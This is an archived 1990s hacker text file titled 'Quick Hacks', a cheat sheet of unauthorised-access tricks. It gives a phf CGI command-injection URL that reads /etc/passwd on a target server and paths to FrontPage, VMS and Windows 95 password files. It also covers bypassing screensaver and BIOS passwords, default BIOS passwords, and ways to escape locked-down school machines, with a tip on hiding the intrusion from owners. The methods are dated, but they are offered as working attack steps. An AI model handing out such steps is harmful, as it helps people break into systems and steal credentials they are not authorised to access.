home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack / quickhacks.txt < prev    next >
Encoding:
Text File  |  1998-12-04  |  4.0 KB  |  164 lines

  1. Quick Hacks
  2.  
  3. These are all quick and simple hacks email me if you've got anymore i'll
  4. write a few programs that will call on DOS etc soon.
  5. The topics covered are vax/vms/windows/dos/macros/bios/etc in no particular
  6. order... This is all pretty common knowledge and it can come in useful
  7. sometimes .
  8.  
  9. [ from http://www.infowar.co.uk/manicx/ ]
  10.  
  11. System:   Webserver Using phf
  12.  
  13. Effect:   Run commands that user "nobody" can use ie (cat /etc/passwd)
  14.  
  15. Command:  http://www.yourtarget.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  16.  
  17.  
  18. System:    Webserver using Microsoft Front Page Extensions
  19.  
  20. Password file: Type the following in your location bar in your browser
  21.  
  22. Command:   www.yourtarget.com/_vti_pvt/service.pwd
  23.  
  24.  
  25. System:    Windows (With VB)
  26.  
  27. Shell out: Put this in a vb application
  28.  
  29. Command:   Private Sub cmdCommand_Click()
  30.                retval = Shell("start /max command.com")
  31.            End Sub
  32.  
  33.  
  34. System:    Windows
  35.  
  36. Shell out: This means get into dos !! use netscape or explorer to
  37.            browse your hardrive (i.e. can run games at school)
  38.  
  39. Command:   file:///c|/windows/command.com in to the location URL
  40. Or
  41. Command:   c:\ first then browse until you get your game.
  42.  
  43.  
  44. System:    Vax Or Vms
  45.  
  46. Function:  Will Dump Some files in your Account Has an effect on your
  47.            reading status too 
  48.  
  49. Command:   $analyze/process_dump
  50.  
  51.  
  52. System:    Vax Or Vms
  53.  
  54. Function:  Where is that startup File
  55.  
  56. Try Here:  SYS$MANAGER:ANNOUNCE.TXT or SYS$Announce.txt
  57.  
  58.  
  59. System:    VMS
  60.  
  61. Function:  Get password in
  62.  
  63. Command:   sys$system:sysuaf.dat
  64.  
  65.            Look at the alt.2600 FAQ for a program called Guess_password
  66.  
  67.  
  68. System:   Windows 95
  69.  
  70. Function: ISP account name and encrypted password
  71.  
  72. Password: c:\windows\user.da0
  73.     
  74. Search  : Account to get ISP name and Password (encrypted)
  75.  
  76.  
  77. System:   Windows 95
  78.  
  79. Function: Get rid of password on screen saver
  80.  
  81. Command:  just turn off password protection before screen saver comes on
  82.           Or
  83.           press ctrl+alt+del if its a non standard screensaver
  84.           Or
  85.           edit c:\windows\control.ini change PWprotected=1 to 0
  86.           and delete after the Password=
  87.  
  88. System:    Windows
  89.  
  90. Function:  Gets rid of BIOS password (and resets CMOS settings)
  91.  
  92. Command:   download this file unzip and run
  93.            killcmos.zip
  94.  
  95.  
  96. System:   BIOS
  97.  
  98. Function: Remove BIOS password
  99.  
  100. Command:  Pull out the CMOS battery for 5-10 minutes
  101.           Then go through setup again once you have installed the battery
  102.           Best idea is to put in a new password :) then they will think
  103.           that they just forgot it ]:'
  104.  
  105.  
  106. System:   BIOS
  107.  
  108. Function: BIOS Password Defaults
  109.  
  110. Command:  Defaults are RM, BIOS, password, Tiny, compaq, Award
  111.           admin, system
  112.  
  113.  
  114. System:   Windows
  115.  
  116. Function: Get past any password protection before boot-up
  117.  
  118. Command:  Try booting from a floppy
  119.           or holding down the shift key during startup
  120.  
  121. System:   Windows
  122.  
  123. Function: Shell out (get into DOS)
  124.  
  125. Command:  open wordpad or winword etc
  126.           Open command.com in the word editor
  127.           save it as something you can use i.e. calc.exe
  128.           close word or whatever down
  129.           run calc to get into dos.
  130.           Or..
  131.           Write a small program in tpw or c or whatever
  132.           that puts you in DOS.
  133.           Had one written in Turbo Pascal i'll try and get as many
  134.           as i can in the near future and stick em up here..
  135.  
  136. System:   Windows
  137.  
  138. Function: Shell out (get into DOS)
  139.  
  140. Command:  Open word 97 if you've got it
  141.           Goto insert then object
  142.           Click on create from file
  143.           in file type c:\command.com or c:\windows\command.com
  144.           click OK
  145.           Right click on the inserted file and goto package object then
  146.           activate contents
  147.  
  148. System:   Windows
  149.  
  150. Function: Shell out (get into DOS)
  151.  
  152. Command:  Save this file 
  153.           Letmeout
  154.           on your desktop type in c:\windows\desktop\letmeout.bat
  155.           then just click on it.
  156.  
  157.           In the .bat file it has one line (see below)
  158.           call command.com
  159.           so you can make up your own .bat files
  160.           simply run wordpad list down your commands
  161.           and save as whatever.bat
  162.  
  163.  
  164.